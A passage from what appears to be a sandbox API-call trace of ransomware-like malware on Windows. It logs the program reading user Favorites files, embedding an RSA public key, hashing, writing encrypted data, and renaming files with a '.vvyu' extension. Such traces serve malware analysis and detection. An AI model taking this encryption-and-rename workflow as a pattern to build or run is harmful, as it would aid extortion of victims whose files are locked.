dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0194.490] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.490] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0194.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0194.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0194.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.491] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.491] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.491] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.491] CloseHandle (hObject=0x584) returned 1 [0194.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0194.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0194.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0194.493] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Sports.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn sports.url.vvyu")) returned 1 [0194.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.494] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0194.498] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0194.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0194.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.499] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN.url") returned=".url" [0194.499] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0194.502] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=133) returned 1 [0194.502] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0194.505] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.505] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.518] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.518] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x85, lpOverlapped=0x0) returned 1 [0194.518] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0194.518] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.518] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.518] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0194.520] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0194.520] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.520] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0194.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0194.520] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0194.520] GetLastError () returned 0x0 [0194.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.520] GetLastError () returned 0x0 [0194.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.521] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0194.521] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0194.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.521] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0194.521] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0194.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.522] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0194.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0194.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x3b48b8 [0194.522] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0194.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0194.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e8 [0194.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0194.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2530 [0194.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae62f0 [0194.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae24e8 [0194.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6308 [0194.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6338 [0194.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6398 [0194.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6350 [0194.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0194.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0194.523] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0194.523] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0194.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0194.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0194.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0194.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6398 [0194.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0194.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6350 [0194.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0194.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6338 [0194.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0194.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0194.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0194.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0194.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0194.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0194.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0194.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0194.524] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0194.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0194.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0194.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0194.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0194.525] GetCurrentThreadId () returned 0x5d8 [0194.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0194.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae7cc8 [0194.525] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0194.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0194.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0194.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0194.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0194.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0194.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.526] GetCurrentThreadId () returned 0x5d8 [0194.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0194.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0194.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0194.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0194.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40210 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6398 [0194.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6338 [0194.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0194.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0194.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6350 [0194.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0194.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0194.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0194.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6320 [0194.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0194.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63b0 [0194.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0194.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6380 [0194.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0194.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6368 [0194.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae63c8 [0194.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0194.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6368 [0194.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0194.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0194.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0194.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0194.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6338 [0194.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0194.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0194.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6398 | out: hHeap=0x2c0000) returned 1 [0194.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0194.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0194.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0194.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0194.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0194.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0194.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0194.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0194.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0194.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0194.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0194.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0194.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0194.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0194.532] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0194.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0194.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0194.533] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: 